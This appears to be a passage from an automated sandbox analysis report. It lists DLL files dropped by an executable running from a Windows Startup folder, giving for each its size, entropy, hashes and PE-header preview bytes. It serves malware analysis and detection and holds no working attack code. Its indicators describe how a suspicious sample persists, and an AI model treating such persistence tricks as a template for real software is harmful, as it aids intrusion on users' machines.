                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%.H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):15872
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.285191078037458
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:wJBjJHEkEPYi3Xd+dc26E4++yuqAyXW9wifD4jqccqgwYUMvEW:ikRwi3wO26Ef+yuIm9PfD7wgwYUMvE
                                                                                                                                                                                                                                                                                                MD5:BBEA5FFAE18BF0B5679D5C5BCD762D5A
                                                                                                                                                                                                                                                                                                SHA1:D7C2721795113370377A1C60E5CEF393473F0CC5
                                                                                                                                                                                                                                                                                                SHA-256:1F4288A098DA3AAC2ADD54E83C8C9F2041EC895263F20576417A92E1E5B421C1
                                                                                                                                                                                                                                                                                                SHA-512:0932EC5E69696D6DD559C30C19FC5A481BEFA38539013B9541D84499F2B6834A2FFE64A1008A1724E456FF15DDA6268B7B0AD8BA14918E2333567277B3716CC4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........TX..:...:...:.....:..;...:...;...:...;...:..?...:..>...:..9...:..R2...:..R:...:..R....:..R8...:.Rich..:.................PE..d....e.........." ...%. ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text...h........ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.505471888568532
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:vd9VkyQ5f8vjVaCHpKpTTjaNe7oca2DW3Q2dhmdcqgwNeecBih:JkP5cjIGpKlqD2D4kzgwNeE
                                                                                                                                                                                                                                                                                                MD5:D2175300E065347D13211F5BF7581602
                                                                                                                                                                                                                                                                                                SHA1:3AE92C0B0ECDA1F6B240096A4E68D16D3DB1FFB0
                                                                                                                                                                                                                                                                                                SHA-256:94556934E3F9EE73C77552D2F3FC369C02D62A4C9E7143E472F8E3EE8C00AEE1
                                                                                                                                                                                                                                                                                                SHA-512:6156D744800206A431DEE418A1C561FFB45D726DC75467A91D26EE98503B280C6595CDEA02BDA6A023235BD010835EA1FC9CB843E9FEC3501980B47B6B490AF7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20992
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.06124024160806
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:bUv5cJMOZA0nmwBD+XpJgLa0Mp8Qpg4P2llyM:0K1XBD+DgLa1yTi
                                                                                                                                                                                                                                                                                                MD5:45616B10ABE82D5BB18B9C3AB446E113
                                                                                                                                                                                                                                                                                                SHA1:91B2C0B0F690AE3ABFD9B0B92A9EA6167049B818
                                                                                                                                                                                                                                                                                                SHA-256:F348DB1843B8F38A23AEE09DD52FB50D3771361C0D529C9C9E142A251CC1D1EC
                                                                                                                                                                                                                                                                                                SHA-512:ACEA8C1A3A1FA19034FD913C8BE93D5E273B7719D76CB71C36F510042918EA1D9B44AC84D849570F9508D635B4829D3E10C36A461EC63825BA178F5AC1DE85FB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text....".......$.................. ..`.rdata..L....@... ...(..............@..@.data...8....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..4............P..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):25088
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.475467273446457
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:oc6HLZiMDFuGu+XHZXmrfXA+UA10ol31tuXy4IYgLWi:B6H1TZXX5XmrXA+NNxWiFdLWi
                                                                                                                                                                                                                                                                                                MD5:CF3C2F35C37AA066FA06113839C8A857
                                                                                                                                                                                                                                                                                                SHA1:39F3B0AEFB771D871A93681B780DA3BD85A6EDD0
                                                                                                                                                                                                                                                                                                SHA-256:1261783F8881642C3466B96FA5879A492EA9E0DAB41284ED9E4A82E8BCF00C80
                                                                                                                                                                                                                                                                                                SHA-512:1C36B80AAE49FD5E826E95D83297AE153FDB2BC652A47D853DF31449E99D5C29F42ED82671E2996AF60DCFB862EC5536BB0A68635D4E33D33F8901711C0C8BE6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...@............................................................`.........................................@i.......i..d...............................4....b...............................a..@............@...............................text....#.......$.................. ..`.rdata.......@...0...(..............@..@.data...8....p.......X..............@....pdata...............Z..............@..@.rsrc................^..............@..@.reloc..4............`..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):12288
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.838534302892255
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:0F/1nb2mhQtkr+juOxKbDbnHcqgYvEkrK:u2f6iuOsbDtgYvEmK
                                                                                                                                                                                                                                                                                                MD5:20708935FDD89B3EDDEEA27D4D0EA52A
                                                                                                                                                                                                                                                                                                SHA1:85A9FE2C7C5D97FD02B47327E431D88A1DC865F7
                                                                                                                                                                                                                                                                                                SHA-256:11DD1B49F70DB23617E84E08E709D4A9C86759D911A24EBDDFB91C414CC7F375
                                                                                                                                                                                                                                                                                                SHA-512:F28C31B425DC38B5E9AD87B95E8071997E4A6F444608E57867016178CD0CA3E9F73A4B7F2A0A704E45F75B7DCFF54490510C6BF8461F3261F676E9294506D09B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13824
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.9047185025862925
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:NRgPX8lvI+KnwSDTPUDEhKWPXcqgzQkvEd:2og9rUD9mpgzQkvE
                                                                                                                                                                                                                                                                                                MD5:43BBE5D04460BD5847000804234321A6
                                                                                                                                                                                                                                                                                                SHA1:3CAE8C4982BBD73AF26EB8C6413671425828DBB7
                                                                                                                                                                                                                                                                                                SHA-256:FAA41385D0DB8D4EE2EE74EE540BC879CF2E884BEE87655FF3C89C8C517EED45
                                                                                                                                                                                                                                                                                                SHA-512:DBC60F1D11D63BEBBAB3C742FB827EFBDE6DFF3C563AE1703892D5643D5906751DB3815B97CBFB7DA5FCD306017E4A1CDCC0CDD0E61ADF20E0816F9C88FE2C9B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d....e.........." ...%..... ......P.....................................................`..........................................9.......9..d....`.......P..d............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):14848
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.300163691206422
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:j0J1gSHxKkwv0i8XSi3Sm57NEEE/qexUEtDrdkrRcqgUF6+6vEX:jM01si8XSi3SACqe7tDeDgUUjvE
                                                                                                                                                                                                                                                                                                MD5:C6B20332B4814799E643BADFFD8DF2CD
                                                                                                                                                                                                                                                                                                SHA1:E7DA1C1F09F6EC9A84AF0AB0616AFEA55A58E984
                                                                                                                                                                                                                                                                                                SHA-256:61C7A532E108F67874EF2E17244358DF19158F6142680F5B21032BA4889AC5D8
                                                                                                                                                                                                                                                                                                SHA-512:D50C7F67D2DFB268AD4CF18E16159604B6E8A50EA4F0C9137E26619FD7835FAAD323B5F6A2B8E3EC1C023E0678BCBE5D0F867CD711C5CD405BD207212228B2B4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K,..*B..*B..*B..R...*B..UC..*B.RC..*B..*C..*B..UG..*B..UF..*B..UA..*B..J..*B..B..*B....*B..@..*B.Rich.*B.........................PE..d....e.........." ...%..... ......P.....................................................`..........................................9......x:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):57856
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.260220483695234
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:9XUqVT1dZ/GHkJnYcZiGKdZHDLtiduprZNZY0JAIg+v:99HGHfJidSK
                                                                                                                                                                                                                                                                                                MD5:0B538205388FDD99A043EE3AFAA074E4
                                                                                                                                                                                                                                                                                                SHA1:E0DD9306F1DBE78F7F45A94834783E7E886EB70F
                                                                                                                                                                                                                                                                                                SHA-256:C4769D3E6EB2A2FECB5DEC602D45D3E785C63BB96297268E3ED069CC4A019B1A
                                                                                                                                                                                                                                                                                                SHA-512:2F4109E42DB7BC72EB50BCCC21EB200095312EA00763A255A38A4E35A77C04607E1DB7BB69A11E1D80532767B20BAA4860C05F52F32BF1C81FE61A7ECCEB35ED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d....e.........." ...%.8...................................................0............`.....................................................d...............l............ ..4...................................@...@............P...............................text....7.......8.................. ..`.rdata..f....P.......<..............@..@.data...8...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):58368
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.276870967324261
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:9jUqho9weF5/eHkRnYcZiGKdZHDL7idErZjZYXGg:9RCneH//id42
                                                                                                                                                                                                                                                                                                MD5:6C3E976AB9F47825A5BD9F73E8DBA74E
                                                                                                                                                                                                                                                                                                SHA1:4C6EB447FE8F195CF7F4B594CE7EAF928F52B23A
                                                                                                                                                                                                                                                                                                SHA-256:238CDB6B8FB611DB4626E6D202E125E2C174C8F73AE8A3273B45A0FC18DEA70C
                                                                                                                                                                                                                                                                                                SHA-512:B19516F00CC0484D9CDA82A482BBFE41635CDBBE19C13F1E63F033C9A68DD36798C44F04D6BD8BAE6523A845E852D81ACADD0D5DD86AF62CC9D081B803F8DF7B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d....e.........." ...%.:...................................................0............`.................................................P...d............................ ..4...................................@...@............P...............................text...x9.......:.................. ..`.rdata.......P.......>..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10752
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.578113904149635
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:R0qVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EpmFWLOXDwo2Pj15XkcX6gbW6z:DVddiT7pgTctEEI4qXDo11kcqgbW6
                                                                                                                                                                                                                                                                                                MD5:FEE13D4FB947835DBB62ACA7EAFF44EF
                                                                                                                                                                                                                                                                                                SHA1:7CC088AB68F90C563D1FE22D5E3C3F9E414EFC04
                                                                                                                                                                                                                                                                                                SHA-256:3E0D07BBF93E0748B42B1C2550F48F0D81597486038C22548224584AE178A543
                                                                                                                                                                                                                                                                                                SHA-512:DEA92F935BC710DF6866E89CC6EB5B53FC7ADF0F14F3D381B89D7869590A1B0B1F98F347664F7A19C6078E7AA3EB0F773FFCB711CC4275D0ECD54030D6CF5CB2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................p'......((..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):22016
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.143719741413071
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:IUv5cRUtPQtjLJiKMjNrDF6pJgLa0Mp8Q90gYP2lXCM:BKR8I+K0lDFQgLa17zU
                                                                                                                                                                                                                                                                                                MD5:76F88D89643B0E622263AF676A65A8B4
                                                                                                                                                                                                                                                                                                SHA1:93A365060E98890E06D5C2D61EFBAD12F5D02E06
                                                                                                                                                                                                                                                                                                SHA-256:605C86145B3018A5E751C6D61FD0F85CF4A9EBF2AD1F3009A4E68CF9F1A63E49
                                                                                                                                                                                                                                                                                                SHA-512:979B97AAC01633C46C048010FA886EBB09CFDB5520E415F698616987AE850FD342A4210A8DC0FAC1E059599F253565862892171403F5E4F83754D02D2EF3F366
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.(...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text...X'.......(.................. ..`.rdata..T....@... ...,..............@..@.data...8....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..4............T..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17920
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.353267174592179
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:7PHNP3Mj7Be/yB/6sB3yxcb+IMcOYqQViCBD8bg6Vf4A:hPcnB8KSsB34cb+bcOYpMCBDX
                                                                                                                                                                                                                                                                                                MD5:D48BFFA1AF800F6969CFB356D3F75AA6
                                                                                                                                                                                                                                                                                                SHA1:2A0D8968D74EBC879A17045EFE86C7FB5C54AEE6
                                                                                                                                                                                                                                                                                                SHA-256:4AA5E9CE7A76B301766D3ECBB06D2E42C2F09D0743605A91BF83069FEFE3A4DE
                                                                                                                                                                                                                                                                                                SHA-512:30D14AD8C68B043CC49EAFB460B69E83A15900CB68B4E0CBB379FF5BA260194965EF300EB715308E7211A743FF07FA7F8779E174368DCAA7F704E43068CC4858
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.(... ......P.....................................................`..........................................I.......J..d....p.......`..................,....C...............................A..@............@...............................text....'.......(.................. ..`.rdata..8....@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):12288
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.741247880746506
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:0F/1nb2mhQtkgU7L9D037tfcqgYvEJPb:u2f6L9DSJxgYvEJj
                                                                                                                                                                                                                                                                                                MD5:4D9182783EF19411EBD9F1F864A2EF2F
                                                                                                                                                                                                                                                                                                SHA1:DDC9F878B88E7B51B5F68A3F99A0857E362B0361
                                                                                                                                                                                                                                                                                                SHA-256:C9F4C5FFCDD4F8814F8C07CE532A164AB699AE8CDE737DF02D6ECD7B5DD52DBD
                                                                                                                                                                                                                                                                                                SHA-512:8F983984F0594C2CAC447E9D75B86D6EC08ED1C789958AFA835B0D1239FD4D7EBE16408D080E7FCE17C379954609A93FC730B11BE6F4A024E7D13D042B27F185
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):14848
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.212941287344097
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:2F/1nb2mhQtkRySMfJ2ycxFzShJD9bAal2QDeJKcqgQx2QY:M2fKRQB2j8JD2fJagQx2QY
                                                                                                                                                                                                                                                                                                MD5:F4EDB3207E27D5F1ACBBB45AAFCB6D02
                                                                                                                                                                                                                                                                                                SHA1:8EAB478CA441B8AD7130881B16E5FAD0B119D3F0
                                                                                                                                                                                                                                                                                                SHA-256:3274F49BE39A996C5E5D27376F46A1039B6333665BB88AF1CA6D37550FA27B29
                                                                                                                                                                                                                                                                                                SHA-512:7BDEBF9829CB26C010FCE1C69E7580191084BCDA3E2847581D0238AF1CAA87E68D44B052424FDC447434D971BB481047F8F2DA1B1DEF6B18684E79E63C6FBDC5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`..........................................9......|:..d....`.......P..@............p..,....3...............................2..@............0...............................text...X........................... ..`.rdata.......0....... ..............@..@.data...8....@.......0..............@....pdata..@....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):14336
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.181291194389683
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:hF/1nb2mhQt7fSOp/CJPvADQHKtxSOvbcqgEvcM+:N2fNKOZWPIDnxVlgEvL
                                                                                                                                                                                                                                                                                                MD5:9D28433EA8FFBFE0C2870FEDA025F519
                                                                                                                                                                                                                                                                                                SHA1:4CC5CF74114D67934D346BB39CA76F01F7ACC3E2
                                                                                                                                                                                                                                                                                                SHA-256:FC296145AE46A11C472F99C5BE317E77C840C2430FBB955CE3F913408A046284
                                                                                                                                                                                                                                                                                                SHA-512:66B4D00100D4143EA72A3F603FB193AFA6FD4EFB5A74D0D17A206B5EF825E4CC5AF175F5FB5C40C022BDE676BA7A83087CB95C9F57E701CA4E7F0A2FCE76E599
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`.........................................09.......9..d....`.......P..@............p..,....3...............................2..@............0...............................text...8........................... ..`.rdata..4....0......................@..@.data...8....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):14336
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.140195114409974
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:RsiHXqpo0cUp8XnUp8XjEQnlDtJI6rcqgcx2:f6DcUp8XUp8AclDA69gcx2
                                                                                                                                                                                                                                                                                                MD5:8A92EE2B0D15FFDCBEB7F275154E9286
                                                                                                                                                                                                                                                                                                SHA1:FA9214C8BBF76A00777DFE177398B5F52C3D972D
                                                                                                                                                                                                                                                                                                SHA-256:8326AE6AD197B5586222AFA581DF5FE0220A86A875A5E116CB3828E785FBF5C2
                                                                                                                                                                                                                                                                                                SHA-512:7BA71C37AAF6CB10FC5C595D957EB2846032543626DE740B50D7CB954FF910DCF7CEAA56EB161BAB9CC1F663BADA6CA71973E6570BAC7D6DA4D4CC9ED7C6C3DA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`..........................................9......0:..d....`.......P..(............p..,....4...............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
